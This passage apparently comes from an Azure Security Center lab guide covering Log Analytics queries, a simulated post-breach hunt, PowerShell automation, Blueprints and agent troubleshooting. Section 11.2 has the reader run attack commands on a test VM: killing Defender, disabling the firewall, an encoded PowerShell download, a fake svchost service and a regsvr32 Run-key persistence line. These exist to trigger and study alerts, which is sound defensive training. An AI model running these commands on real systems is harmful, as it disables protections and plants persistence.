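def latest_heartbeat(rows, computer):
    """Counterpart of 'Heartbeat | where Computer like ... | summarize arg_max(TimeGenerated, *) by Computer':
    the newest row for one computer, or None if it has never reported."""
    mine = [r for r in rows if r["Computer"] == computer]
    return max(mine, key=lambda r: r["TimeGenerated"]) if mine else None


def missing_heartbeat(rows, lookback=timedelta(days=7), stale_after=timedelta(days=1), now=NOW):
    """Counterpart of the section 10.4 query: computers that reported within `lookback`
    but whose newest heartbeat is older than `stale_after`."""
    last_seen = {}
    for r in rows:
        if r["TimeGenerated"] > now - lookback:  # the query's 'TimeGenerated > ago(7d)'
            c = r["Computer"]
            if c not in last_seen or r["TimeGenerated"] > last_seen[c]:
                last_seen[c] = r["TimeGenerated"]
    return sorted(c for c, t in last_seen.items() if t < now - stale_after)


def silent_beyond_lookback(rows, lookback=timedelta(days=7), now=NOW):
    """Hosts the 10.4 query cannot list at all: every heartbeat they ever sent is
    older than the lookback window, so the first 'where' drops them."""
    all_last = {}
    for r in rows:
        c = r["Computer"]
        if c not in all_last or r["TimeGenerated"] > all_last[c]:
            all_last[c] = r["TimeGenerated"]
    return sorted(c for c, t in all_last.items() if t <= now - lookback)


if __name__ == "__main__":
    print("stale within lookback:", missing_heartbeat(HEARTBEAT))        # ['vm-02']
    print("invisible to the query:", silent_beyond_lookback(HEARTBEAT))   # ['vm-03']
    print("vm-01 last seen:", latest_heartbeat(HEARTBEAT, "vm-01")["TimeGenerated"])
```

Widening the lookback in the query (or in `missing_heartbeat`) trades a larger scan for fewer hosts silently dropping out of the stale list; a host that never appears in either list has no Heartbeat rows at all, which is the case the troubleshooting section starts from.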

10.6 Query data across workspaces
You can also query data across Log Analytics workspaces within your subscription.

Query:
union Update, workspace("contoso-workspace").Update
| where TimeGenerated >= ago(1h)
| summarize dcount(Computer) by Classification

Description: Query data across Log Analytics workspaces within your subscription.

For complete documentation on the Azure Log Analytics query language including tutorials and
language reference, see the Azure Log Analytics query language documentation.

11 Post-Breach Threat Detections
Azure Sentinel is designed for threat hunting scenarios, but because Azure Security Center is integrated with Log Analytics, the hunting techniques below can still be used without Sentinel being present.

Note
Don’t forget that ASC can onboard servers into Microsoft Defender for Endpoint, which
provides great threat hunting and investigation capabilities via
https://securitycenter.windows.com/

In this hunting scenario there is an assumption that the attacker is already inside the network
and has already compromised a computer. Now the attacker is continuing their mission and
performing some post-breach activity.

11.1 Pre-requisites
You will need at least one Windows Server 2016 Virtual Machine (Azure VM); the tools used in this workflow are Windows Server built-in tools. To collect Windows Filtering Platform Event ID 5156, which will be used during the hunt, run the commands below from an elevated command prompt on the VM:

Auditpol /set /subcategory:"Filtering Platform Connection" /Success:Enable

gpupdate /force

Also, make sure you have a temp folder under the c:\ drive (c:\temp) on this VM.

Enable remote administration in the VM using the command below:

netsh firewall set service remoteadmin enable

Go back to section 2.3 and confirm that data collection is set to "All Events".

Confirm that the Server 2016 VM to be used is showing up in ASC as "Monitored":

11.2 Executing the Attack
The steps that follow assume that the attacker has already compromised the machine; in cyber kill chain terms this means the attacker has already passed the Target and Attack phases. Now the attacker is moving to the Installation and Exploitation phase.

Cyber kill chain phase: Install and Exploit.

In this simulation you will verify which user is currently logged in to the system, obtain system information, obtain information about sessions on a Remote Desktop Session Host (RD Session Host), try to terminate the antimalware process, and try to disable Windows Firewall for all profiles.

Execute the steps below:

1. Log on to the VM, open an administrative cmd prompt and execute the following commands:
   (a) whoami
   (b) systeminfo
   (c) qwinsta
   (d) taskkill /f /im msmpeng.exe
   (e) netsh advfirewall set currentprofile state off
   (f) netsh advfirewall set domainprofile state off
   (g) netsh advfirewall set allprofiles state off

Cyber kill chain phase: Post-Exploit.

In this simulation you will use PowerShell with the -EncodedCommand parameter to run a command supplied as a base64-encoded string. The encoded command contains the path to download a file from an external site. Attackers use this technique to obfuscate attacks at runtime.

2. Open PowerShell and execute:

powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABlAGwAbAAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJgAgAHsAIABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBkAG8AdwBuAGwAbwBhAGQALgBzAHkAcwBpAG4AdABlAHIAbgBhAGwAcwAuAGMAbwBtAC8AZgBpAGwAZQBzAC8AUwB5AHMAbQBvAG4ALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAGMAOgBcAHQAZQBtAHAAXABzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIAB9ACIA"

The command line that is encoded has the following command:

powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }"

Note: the intent of this command is to simulate the download of a file from an external location and save it in a local folder under a different name. Now the attacker is going to try to establish persistence by creating a service based on the file that was downloaded.

Notice that the second command below (starting the service) will fail, but for this example the attempt to start it is already enough.

Now run the following commands; you should receive an error 216 on the start attempt. This is expected:

3. sc.exe create "svvchost" binpath= "C:\temp\svchost.exe"
4. sc.exe start svvchost
5. md c:\programs
6. cd \programs
7. copy c:\windows\system32\svchost.exe
8. Create a text file called 23st34s1.txt in the programs folder.
9. Edit this file in Notepad and add the following address: http://www.contoso.com/stext.js
10. Save the file and, back in the cmd prompt, run: svchost.exe 23st34s1.txt
11. Finally, to continue persistence the attacker can add a registry entry to download a malicious program on restart. (Note that this does not actually download any file.) To simulate this, run:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "start" /d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f

11.3 Reviewing Security Center Alerts

The first part of the hunt is to use the Azure Security Center dashboard to review the alerts. By the time you finish all the previous steps, you should have a sequence of alerts similar to the ones that follow:

Suspicious PowerShell Activity Detected

Notice that Security Center was able to decode the original PowerShell encoded command and
expose the script that was running on it. Having this information can be important during the
hunt, since you already know what was downloaded.

Suspicious SVCHOST process executed

Suspicious Activity Detected

The description of this alert emphasizes the fact that this sequence has historically been
associated with malicious activity, and the alert gives you the list of the commands that were
executed.

Windows registry persistence method detected

This command will trigger two alerts: the first is the registry persistence alert shown above, and the other is the attempt to bypass AppLocker, shown below.

Potential attempt to bypass AppLocker detected

The regsvr32 utility can be used to request and execute the script from the webserver
controlled by the attacker. On hosts where tight AppLocker executable and script rules are
enforced, attackers are often seen using regsvr32 and a script file located on the Internet to
attempt a script rule bypass and run their malicious script.

11.4 Using Log Analytics to Hunt Threats

Note
The Search menu entry point in Security Center will be removed in July 2019, but Log Analytics -> Workspace -> Logs can still be used as the entry point for these techniques.

1. Go to the Log Analytics workspace that your VM is reporting to and select Logs.
2. Under the Run button
3. Run the following search query:
SecurityEvent
| where CommandLine contains "regsvr32"
Example:

You should receive a result that contains a table of values with a lot of columns, including TenantID, TimeGenerated, SourceSystem, Account, and many others. While it is good to have this information, sometimes you don't need to see all of it. To optimize the output and focus only on what you need, you can use the project operator to list only the columns that are relevant for your hunt. Type the query below and click Run:
SecurityEvent
| where CommandLine contains "regsvr32"
| project TimeGenerated , Computer , Account , CommandLine , SubjectLogonId

It is always a good idea to see what commands were executed in the proximity of your point of
reference (which in this case is the execution of regsvr32). Basically, you want to understand
what else was executed before. To accomplish that you need two new parameters:

• Query for Event ID 4688, which is generated every time a new process starts.
• Use the TimeGenerated field and the numerical operators greater-or-equal and less-or-equal to query a specific range of time.

Use the following query as your base, but replace the TimeGenerated values to match your own environment. Keep in mind that the time range may vary; you can start with a short time range and keep expanding it until you find more relevant information. Experiment with the range and see which results you get.
SecurityEvent
| where TimeGenerated >= todatetime('2018-07-30T19:10:05.727') and TimeGenerated <= todatetime('2018-07-30T19:35:05.727')
| where EventID == "4688"
| project TimeGenerated , Computer , Account , CommandLine , SubjectLogonId
| order by TimeGenerated asc

An example of this output is shown below:

In a production environment, it is possible that this query will generate a lot of results, and at
this point you want to focus your attention on the commands that were executed within the
same session. You can use the SubjectLogonId field to narrow your query. Use the following
query as your base, but you need to replace the SubjectLogonId field to match the
SubjectLogonId of the regsvr32 execution in your own environment:
SecurityEvent
| where TimeGenerated >= todatetime('2018-07-30T19:10:05.727') and TimeGenerated <= todatetime('2018-07-30T19:35:05.727')
| where EventID == "4688"
| where SubjectLogonId == "0x8c375"
| project TimeGenerated , Computer , Account , CommandLine , SubjectLogonId
| order by TimeGenerated asc

An example of this output is shown below:

We have now narrowed down the commands that were executed in the same session. This can help you understand more about the commands that were executed before and after the regsvr32. However, Azure Security Center already triggered an alert about the PowerShell execution, so you have another reference point to investigate. Type the query below and click Run:
SecurityEvent
| where Process contains "powershell.exe" and CommandLine contains " -enc"
| extend b64 = extract("[A-Za-z0-9|+|=|/]{30,}", 0,CommandLine)
| extend utf8_decode=base64_decodestring(b64)
| project TimeGenerated , Computer, CommandLine, utf8_decode, SubjectLogonId

The query above uses the extend operator to show the encoded command line and its decoded value. From here you can get the new SubjectLogonId and change the query to filter only for that session. The decoded string shows that PowerShell is accessing an external website to download a tool. In a real-world scenario this is common practice in the post-breach phase, mainly when the attacker is trying to reach command and control to download malware. It is a good idea to validate which external IP address PowerShell is trying to contact. For that we will take advantage of event ID 5156, which the Windows Filtering Platform writes each time it allows a program to connect to another process on the same computer or on a remote host over a TCP or UDP port. Type the query below and click Run:
SecurityEvent
| where EventID == "5156"
| where tostring(EventData) contains "powershell"
| project Computer, EventData
| extend X = parse_xml(EventData)
| extend Application = X.EventData.Data[1]["#text"]
| extend SourceAddress = X.EventData.Data[3]["#text"]
| extend DestAddress = X.EventData.Data[5]["#text"]
| project Computer, Application, SourceAddress, DestAddress

The result of this query should reveal the destination IP address. One good practice is to verify whether other machines in your environment are connecting to that particular IP address. This could lead you to identify other systems that might be compromised. In the query below, replace "X.X.X.X" with the destination IP address that you found in the previous query, and click Run:
SecurityEvent
| where EventID == "5156"
| where tostring(EventData) contains "X.X.X.X"
| project Computer, EventData
| extend X = parse_xml(EventData)
| extend Application = X.EventData.Data[1]["#text"]
| extend SourceAddress = X.EventData.Data[3]["#text"]
| extend DestAddress = X.EventData.Data[5]["#text"]
| project Computer, Application, SourceAddress, DestAddress

In this case, since we are using only one VM, you should only see one result, which is the VM
where you ran the encoded PowerShell command.
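The hunt steps of this section, as an added Python example rather than the guide's own KQL: it decodes the -EncodedCommand payload out of a 4688 command line, lists the commands of one logon session in time order, and parses 5156 EventData to find which hosts contacted the same destination. Every row, host name, address, logon ID and the encoded command are constructed for the example; the Data order in the XML mirrors the positional indexes the page's queries use (Data[1], Data[3], Data[5]), but the parser reads each Data element by its Name attribute so a reordered payload cannot shift the columns. One caveat worth knowing: PowerShell's encoded payload is UTF-16LE, so decoding it as UTF-8 (what base64_decodestring does) leaves a NUL byte after every character.

```python
import base64
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

# All records below are constructed stand-ins for SecurityEvent rows, not real telemetry.
# The encoded command is produced from plaintext the way PowerShell expects it:
# base64 over the UTF-16LE bytes of the command text. The download URL is a placeholder.
PLAINTEXT_CMD = 'powershell -command "& { iwr https://files.example.invalid/tool.zip -OutFile c:\\temp\\svchost.exe }"'
ENCODED_CMD = base64.b64encode(PLAINTEXT_CMD.encode("utf-16le")).decode("ascii")

EVENTS_4688 = [  # EventID 4688 rows: one session (0x8c375) plus an unrelated one (0x3e7)
    {"TimeGenerated": "2018-07-30T19:12:01", "Computer": "vm-01", "SubjectLogonId": "0x8c375",
     "Process": "cmd.exe", "CommandLine": "whoami"},
    {"TimeGenerated": "2018-07-30T19:20:11", "Computer": "vm-01", "SubjectLogonId": "0x8c375",
     "Process": "powershell.exe",
     "CommandLine": "powershell -nop -exec bypass -EncodedCommand " + ENCODED_CMD},
    {"TimeGenerated": "2018-07-30T19:25:40", "Computer": "vm-01", "SubjectLogonId": "0x8c375",
     "Process": "sc.exe", "CommandLine": "sc.exe create svvchost binpath= C:\\temp\\svchost.exe"},
    {"TimeGenerated": "2018-07-30T19:26:02", "Computer": "vm-01", "SubjectLogonId": "0x3e7",
     "Process": "svchost.exe", "CommandLine": "svchost.exe -k netsvcs"},
]


def event_data_xml(application, src, dst):
    """Build a constructed 5156 EventData payload in the layout the page's parse_xml()
    query indexes: Data[1]=Application, Data[3]=SourceAddress, Data[5]=DestAddress."""
    return (
        '<EventData xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        '<Data Name="ProcessID">4242</Data>'
        f'<Data Name="Application">{application}</Data>'
        '<Data Name="Direction">%%14593</Data>'
        f'<Data Name="SourceAddress">{src}</Data><Data Name="SourcePort">51522</Data>'
        f'<Data Name="DestAddress">{dst}</Data><Data Name="DestPort">443</Data>'
        '<Data Name="Protocol">6</Data></EventData>'
    )


PS_PATH = "\\device\\harddiskvolume2\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
EVENTS_5156 = [  # constructed: vm-01 and vm-02 reach the same destination, vm-03 does not
    {"Computer": "vm-01", "EventData": event_data_xml(PS_PATH, "10.0.0.4", "203.0.113.10")},
    {"Computer": "vm-02", "EventData": event_data_xml(
        "\\device\\harddiskvolume2\\temp\\svchost.exe", "10.0.0.5", "203.0.113.10")},
    {"Computer": "vm-03", "EventData": event_data_xml(
        "\\device\\harddiskvolume2\\program files\\browser\\browser.exe", "10.0.0.6", "198.51.100.7")},
]

# Same intent as the page's extract() pattern, without the stray '|' characters in its class.
B64_RUN = re.compile(r"[A-Za-z0-9+/=]{30,}")


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None when the line carries none
    or the candidate run is not valid base64 / UTF-16LE."""
    if " -enc" not in command_line.lower():  # KQL 'contains' is case-insensitive too
        return None
    m = B64_RUN.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def commands_in_session(events, logon_id):
    """Counterpart of the page's 4688 query filtered on SubjectLogonId, ordered by time."""
    rows = [e for e in events if e["SubjectLogonId"] == logon_id]
    return [e["CommandLine"] for e in sorted(rows, key=lambda e: e["TimeGenerated"])]


def parse_5156(xml_text):
    """Pull the hunt's three fields out of a 5156 EventData blob by Data Name."""
    fields = {}
    for el in ET.fromstring(xml_text).iter():
        if el.tag.rsplit("}", 1)[-1] == "Data" and el.get("Name"):
            fields[el.get("Name")] = el.text or ""
    return {k: fields.get(k, "") for k in ("Application", "SourceAddress", "DestAddress")}


def powershell_destinations(events):
    """First 5156 query on the page: which destinations did powershell connect to?"""
    return [(e["Computer"], parse_5156(e["EventData"])["DestAddress"])
            for e in events if "powershell" in e["EventData"].lower()]


def hosts_contacting(events, dest_ip):
    """Second 5156 query on the page: every computer (and program) that reached dest_ip."""
    hits = defaultdict(set)
    for e in events:
        p = parse_5156(e["EventData"])
        if p["DestAddress"] == dest_ip:
            hits[e["Computer"]].add(p["Application"].rsplit("\\", 1)[-1])
    return {c: sorted(apps) for c, apps in sorted(hits.items())}


if __name__ == "__main__":
    for line in commands_in_session(EVENTS_4688, "0x8c375"):
        print(line[:60], "->", decode_encoded_command(line))
    pivot = powershell_destinations(EVENTS_5156)
    print(pivot)                                        # [('vm-01', '203.0.113.10')]
    print(hosts_contacting(EVENTS_5156, pivot[0][1]))   # {'vm-01': ['powershell.exe'], 'vm-02': ['svchost.exe']}
```

The pivot at the end is the point of the second 5156 query: the destination found from the PowerShell event becomes the key for a second pass over all 5156 events, which here surfaces vm-02 as a second host talking to the same address through a binary named like the service payload from section 11.2.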

12 PowerShell Automation of ASC Tasks

12.1 Install the ASC PowerShell module


Azure Security Center's new PowerShell module is integrated into the new Az.* Azure PowerShell modules, which replace the older AzureRM modules.

For more information on this replacement see: https://azure.microsoft.com/en-us/blog/azure-powershell-cross-platform-az-module-replacing-azurerm/ and https://azure.microsoft.com/en-us/blog/azure-powershell-az-module-version-1/

1. Launch an elevated PowerShell window
2. Type: Install-Module Az.Security -AllowClobber

12.2 Run module to get alerts

1. Open a new PowerShell console
2. Type: Set-ExecutionPolicy Unrestricted (Normally Unrestricted isn't recommended, but this is a test environment. For a production environment, set it per company policy.)
3. Type: Import-Module Az.Accounts and then Connect-AzAccount. Note the warning and instructions: you will go to a URL and paste in the provided device code to sign in your PS session.
4. Run: Get-AzSecurityAlert | Format-Table *display*,*time*

12.3 Setting Security Contact Details Across Multiple Subscriptions (optional)
For customers that have many subscriptions, we can use PowerShell to loop through all the subscriptions available to that user and update the security contact details with the following PS:

# Authenticate to Azure
Login-AzAccount

# Loop through all subscriptions and set the security contact in each one
Get-AzContext -ListAvailable -PipelineVariable AzureRMSub | Set-AzContext | ForEach-Object {
    Set-AzSecurityContact -Name 'default1' -Email "security@contoso.com" -Phone "555-555-5555" -NotifyOnAlert -AlertAdmin
}

13 Continuously export Security Center data
Azure Security Center generates detailed security alerts and recommendations. You can view
them in the portal or through programmatic tools. You might also need to export some or all of
this information for tracking with other monitoring tools in your environment.

Continuous export lets you fully customize what will be exported, and where it will go. For example, you can configure it so that:

• All high severity alerts are sent to an Azure Event Hub
• All medium or higher severity findings from vulnerability assessment scans of your SQL servers are sent to a specific Log Analytics workspace
• Specific recommendations are delivered to an Event Hub or Log Analytics workspace whenever they're generated

Generally it's recommended to collect and correlate security events in a single Security Information and Event Management (SIEM) system. Integration with Azure Sentinel, the Microsoft cloud-based SIEM, can be enabled with a single click, as the Azure Security Center connector is built in.

To integrate with other SIEMs you can get additional details by following the links below:

• Splunk - Use the Azure Monitor Add-On for Splunk
• IBM QRadar - Use a manually configured log source
• ArcSight - Use SmartConnector

14 Management Groups

Overview
Please refer to https://docs.microsoft.com/en-us/azure/governance/management-groups/ for
more information.

Create a management group structure

Draft with the customer a hierarchy that would be a good starting point for them based on their current requirements. Refer to the link in the previous section or show them the sample structure below for reference:

10. Launch the Management Groups service in the Azure portal by clicking All services, then searching for and selecting Management Groups.
11. Click Add Management Group to create the desired structure.
12. Once created, navigate to the Tenant Root Group, click the ellipsis next to your subscription, and select Move.
13. Select the desired level in the hierarchy to move your subscription to.

Create a hierarchy so you can apply a policy, for example, limit VM locations to US West
Region on the group "Production". This policy will inherit onto both EA subscriptions
under that management group and will apply to all VMs under those subscriptions.

15 Blueprints

Overview
Please refer to https://docs.microsoft.com/en-us/azure/governance/blueprints/overview for
more information.

Azure Blueprints helps you deploy and update cloud environments in a repeatable manner using composable artifacts such as Azure Resource Manager templates to provision resources, role-based access controls, and policies.

How it's different from Azure Policy

A blueprint is a package or container for composing focus-specific sets of standards, patterns, and requirements related to the implementation of Azure cloud services, security, and design that can be reused to maintain consistency and compliance.

A policy is a default allow and explicit deny system focused on resource properties during
deployment and for already existing resources. It supports cloud governance by validating that
resources within a subscription adhere to requirements and standards.

Including a policy in a blueprint enables the creation of the right pattern or design during
assignment of the blueprint. The policy inclusion makes sure that only approved or expected
changes can be made to the environment to protect ongoing compliance to the intent of the
blueprint.

A policy can be included as one of many artifacts in a blueprint definition. Blueprints also
support using parameters with policies and initiatives.

Blueprint definition locations

When creating a blueprint definition, you'll define where the blueprint is saved. Blueprints can be saved to a management group or subscription that you have Contributor access to. If the location is a management group, the blueprint is available to assign to any child subscription of that management group.

Blueprint parameters
Blueprints can pass parameters to either a policy/initiative or an Azure Resource Manager
template. When adding either artifact to a blueprint, the author decides to provide a defined
value for each blueprint assignment or to allow each blueprint assignment to provide a value at
assignment time. This flexibility provides the option to define a pre-determined value for all uses
of the blueprint or to enable that decision to be made at the time of assignment.

Create a Blueprint
1. Click on All services, then search for and select Policy in the left pane. On the Policy page, click on Blueprints.
2. Select Blueprint Definitions from the page on the left and click the + Create Blueprint button at the top of the page.
3. Enter a name and description, and in the Definition Location box click the ellipsis on the right, select the desired management group and click Select.
4. Click Next: Artifacts at the bottom of the page.
5. Start adding the desired artifacts. As a first example, add a Role Assignment at the subscription level to define RBAC permissions.

6. Once finished, click Save draft.
7. Select Blueprint Definitions from the page on the left.
8. In the list of blueprints, right-click on the one you previously created and select Publish Blueprint.
9. On the dialog that opens, provide a Version (letters, numbers, and hyphens with a max length of 20 characters) such as 'v1' and Change notes (optional) such as 'First publish'.
10. Click Publish at the bottom of the page.

Assign a blueprint
Once a blueprint has been published, it can be assigned to a subscription. Assign the blueprint you created to one of the subscriptions in your management group hierarchy.

11. Select Blueprint Definitions from the page on the left.
12. In the list of blueprints, right-click on the one you previously created (or left-click on the ellipsis) and select Assign Blueprint.
13. On the Assign Blueprint page, select the subscription(s) you want to deploy this blueprint to from the Subscription drop-down.

Note
An assignment is created for each subscription that is selected allowing changes to a
single subscription assignment at a later time without forcing changes on the remainder
of the selected subscriptions.

14. For Assigned Name, provide a unique name for this assignment.
15. In Location, select a region for the managed identity to be created in. Azure Blueprint uses this managed identity to deploy all artifacts in the assigned blueprint.
16. Leave the Blueprint definition version drop-down of Published versions on the 'v1' entry (default as the most recently Published version).
17. For Lock Assignment, leave the default of Don't Lock.
18. For the subscription level role assignment [User group or application name] : Contributor, search for and select a user, app, or group.
19. For the subscription level policy assignment, set the Tag Name to 'CostCenter' and the Tag Value to the desired value.
20. For the 'ResourceGroup', provide a Name of 'StorageAccount' and a Location from the drop-down.
21. On the Azure Resource Manager template 'StorageAccount', select 'Standard_GRS' for the storageAccountType parameter.
22. Read the information box at the bottom of the page and then click Assign.

Track deployment of a blueprint

When a blueprint has been assigned to one or more subscriptions, two things happen:

• The blueprint is added to the Assigned Blueprints page per subscription assigned to
• The process of deploying all the artifacts defined by the blueprint begins

Now that the blueprint has been assigned to a subscription, verify progress of the deployment.

23. Select Assigned Blueprints from the page on the left.
24. In the list of blueprints, right-click on the one you previously assigned and select View Assignment Details.

16 Troubleshoot

16.1 Log Analytics agent for Windows

This information provides help troubleshooting errors you might experience with the Log Analytics agent for Windows in Azure Monitor and suggests possible solutions to resolve them.

If none of these steps work for you, the following support channels are also available:
• Customers with Premier support benefits can open a support request with Premier.
• Customers with Azure support agreements can open a support request in the
Azure portal.
• Visit the Log Analytics Feedback page to review submitted ideas and
bugs https://aka.ms/opinsightsfeedback or file a new one.

Important troubleshooting sources

To assist with troubleshooting issues related to the Log Analytics agent for Windows, the agent logs events to the Windows Event Log, specifically under Applications and Services Logs > Operations Manager.

Connectivity issues

If the agent is communicating through a proxy server or firewall, there may be restrictions in
place preventing communication from the source computer and the Azure Monitor service. In
case communication is blocked, because of misconfiguration, registration with a workspace
might fail while attempting to install the agent or configure the agent post-setup to report to an
additional workspace. Agent communication may fail after successful registration. This section
describes the methods to troubleshoot this type of issue with the Windows agent.

Double-check that the firewall or proxy is configured to allow the ports and URLs described in the following table. Also confirm HTTPS inspection is not enabled for this traffic, as it can prevent a secure TLS channel between the agent and Azure Monitor.

Agent Resource                    Ports     Direction   Bypass HTTPS inspection
*.ods.opinsights.azure.com        Port 443  Outbound    Yes
*.oms.opinsights.azure.com        Port 443  Outbound    Yes
*.blob.core.windows.net           Port 443  Outbound    Yes
*.agentsvc.azure-automation.net   Port 443  Outbound    Yes

For firewall information required for Azure Government, see Azure Government management. If
you plan to use the Azure Automation Hybrid Runbook Worker to connect to and register with
the Automation service to use runbooks or management solutions in your environment, it must
have access to the port number and the URLs described in Configure your network for the
Hybrid Runbook Worker.

There are several ways you can verify if the agent is successfully communicating with Azure
Monitor.

• Enable the Azure Log Analytics Agent Health assessment in the workspace. From the Agent Health dashboard, view the Count of unresponsive agents column to quickly see if the agent is listed.
• Run the following query to confirm the agent is sending a heartbeat to the workspace it is configured to report to. Replace <ComputerName> with the actual name of the machine.

Heartbeat
| where Computer like "<ComputerName>"
| summarize arg_max(TimeGenerated, * ) by Computer

• If the computer is successfully communicating with the service, the query should return a result. If the query did not return a result, first verify the agent is configured to report to the correct workspace. If it is configured correctly, proceed to step 3 and search the Windows Event Log to identify if the agent is logging what issue might be preventing it from communicating with Azure Monitor.
• Another method to identify a connectivity issue is by running the TestCloudConnectivity tool. The tool is installed by default with the agent in the folder %SystemRoot%\Program Files\Microsoft Monitoring Agent\Agent. From an elevated command prompt, navigate to the folder and run the tool. The tool returns the results and highlights where the test failed (for example, if it was related to a particular port/URL that was blocked).

Filter the Operations Manager event log by Event sources Health Service Modules, HealthService, and Service Connector, and by Event Level Warning and Error, to confirm whether it has written events from the following table. If it has, review the resolution steps included for each possible event.

Event ID: 2133 & 2129
Source: Health Service
Description: Connection to the service from the agent failed
Resolution: This error can occur when the agent cannot communicate directly or through a firewall/proxy server to the Azure Monitor service. Verify agent proxy settings or that the network firewall/proxy allows TCP traffic from the computer to the service.

Event ID: 2138
Source: Health Service Modules
Description: Proxy requires authentication
Resolution: Configure the agent proxy settings and specify the username/password required to authenticate with the proxy server.

Event ID: 2129
Source: Health Service Modules
Description: Failed connection/Failed TLS negotiation
Resolution: Check your network adapter TCP/IP settings and agent proxy settings.

Event ID: 2127
Source: Health Service Modules
Description: Failure sending data received error code
Resolution: If it only happens periodically during the day, it could just be a random anomaly that can be ignored. Monitor to understand how often it happens. If it happens often throughout the day, first check your network configuration and proxy settings. If the description includes HTTP error code 404 and it's the first time that the agent tries to send data to the service, it will include a 500 error with an inner 404 error code. 404 means not found, which indicates that the storage area for the new workspace is still being provisioned. On the next retry, data will successfully write to the workspace as expected. An HTTP error 403 might indicate a permission or credentials issue. There is more information included with the 403 error to help troubleshoot the issue.

Event ID: 4000
Source: Service Connector
Description: DNS name resolution failed
Resolution: The machine could not resolve the Internet address used when sending data to the service. This might be DNS resolver settings on your machine, incorrect proxy settings, or maybe a temporary DNS issue with your provider. If it happens periodically, it could be caused by a transient network-related issue.

Event ID: 4001
Source: Service Connector
Description: Connection to the service failed.
Resolution: This error can occur when the agent cannot communicate directly or through a firewall/proxy server to the Azure Monitor service. Verify agent proxy settings or that the network firewall/proxy allows TCP traffic from the computer to the service.

Event ID: 4002
Source: Service Connector
Description: The service returned HTTP status code 403 in response to a query. Check with the service administrator for the health of the service. The query will be retried later.
Resolution: This error is written during the agent's initial registration phase and you'll see a URL similar to the following: https://<workspaceID>.oms.opinsights.azure.com/AgentService.svc/AgentTopologyRequest. An error code 403 means forbidden and can be caused by a mistyped Workspace ID or key, or by the date and time being incorrect on the computer. If the time is +/- 15 minutes from the current time, then onboarding fails. To correct this, update the date and/or time zone of your Windows computer.

Data collection issues

After the agent is installed and reports to its configured workspace or workspaces, it may stop
receiving configuration, or stop collecting or forwarding performance, logs, or other data to the
service, depending on what is enabled and targeting the computer. It is necessary to determine:
• Is it a particular data type or all data that is not available in the workspace?
• Is the data type specified by a solution or specified as part of the workspace data
collection configuration?
• How many computers are affected? Is it a single computer or multiple computers reporting to the
workspace?
• Was it working and did it stop at a particular time of day, or has it never been collected?
• Is the log search query you are using syntactically correct?
• Has the agent ever received its configuration from Azure Monitor?

The first step in troubleshooting is to determine if the computer is sending a heartbeat event.

Heartbeat
| where Computer like "<ComputerName>"
| summarize arg_max(TimeGenerated, *) by Computer

If the query returns results, then you need to determine if a particular data type is not collected
and forwarded to the service. This could be caused by the agent not receiving updated
configuration from the service, or some other symptom preventing the agent from operating
normally. Perform the following steps to further troubleshoot.

1. Open an elevated command prompt on the computer and restart the agent service by
typing net stop healthservice && net start healthservice.
2. Open the Operations Manager event log and search for event IDs 7023, 7024, 7025,
7028 and 1210 from Event source HealthService. These events indicate the agent is
successfully receiving configuration from Azure Monitor and is actively monitoring
the computer. The event description for event ID 1210 will also specify on the last line all
of the solutions and Insights that are included in the scope of monitoring on the agent.

If after several minutes you still do not see the expected data in the query results or visualization
(depending on whether you are viewing the data from a solution or an Insight), search the Operations
Manager event log for Event sources HealthService and Health Service Modules, filtered by Event Level
Warning and Error, to confirm whether it has written any of the events in the following table.

Event ID | Source | Description | Resolution
8000 | HealthService | This event will specify if a workflow related to performance, event, or other data type collected is unable to forward to the service for ingestion to the workspace. | Event ID 2136 from source HealthService is written together with this event and can indicate the agent is unable to communicate with the service, possibly due to misconfiguration of the proxy and authentication settings, a network outage, or the network firewall/proxy not allowing TCP traffic from the computer to the service.
10102 and 10103 | Health Service Modules | Workflow could not resolve data source. | This can occur if the specified performance counter or instance does not exist on the computer or is incorrectly defined in the workspace data settings. If this is a user-specified performance counter, verify the information specified follows the correct format and exists on the target computers.
26002 | Health Service Modules | Workflow could not resolve data source. | This can occur if the specified Windows event log does not exist on the computer. This error can be safely ignored if the computer is not expected to have this event log registered; otherwise, if this is a user-specified event log, verify the information specified is correct.

16.2 Log Analytics agent for Linux

This information provides help troubleshooting errors you might experience with the Log
Analytics agent for Linux in Azure Monitor and suggests possible solutions to resolve them.

If none of these steps work for you, the following support channels are also available:
• Customers with Premier support benefits can open a support request with Premier.
• Customers with Azure support agreements can open a support request in the Azure
portal.
• Diagnose OMI problems with the OMI troubleshooting guide.
• File a GitHub Issue.
• Visit the Log Analytics Feedback page to review submitted ideas and
bugs (https://aka.ms/opinsightsfeedback) or file a new one.

How to Use

The Troubleshooting Tool can be run by pasting the following command into a terminal window
on a machine with the Log Analytics agent:

sudo /opt/microsoft/omsagent/bin/troubleshooter

Manual Installation

The Troubleshooting Tool is automatically included upon installation of the Log Analytics Agent.
However, if installation fails in any way, it can also be installed manually by following the steps
below.
1. Copy the troubleshooter bundle onto your machine:
wget https://raw.github.com/microsoft/OMS-Agent-for-Linux/master/source/code/troubleshooter/omsagent_tst.tar.gz
2. Unpack the bundle: tar -xzvf omsagent_tst.tar.gz
3. Run the manual installation: sudo ./install_tst

Scenarios Covered

Below is a list of scenarios checked by the Troubleshooting Tool:

1. Agent is unhealthy, heartbeat doesn't work properly
2. Agent doesn't start, can't connect to the Log Analytics service
3. Agent syslog isn't working
4. Agent has high CPU / memory usage
5. Agent having installation issues
6. Agent custom logs aren't working
7. Collect Agent logs

For more details, please check out the GitHub documentation.

Important: Please run the Log Collector tool when you experience an issue. Having the logs
initially will greatly help the support team troubleshoot your issue more quickly.

Purge and Re-Install the Linux Agent

A clean re-install of the Agent will fix most issues. In fact, this may be the first
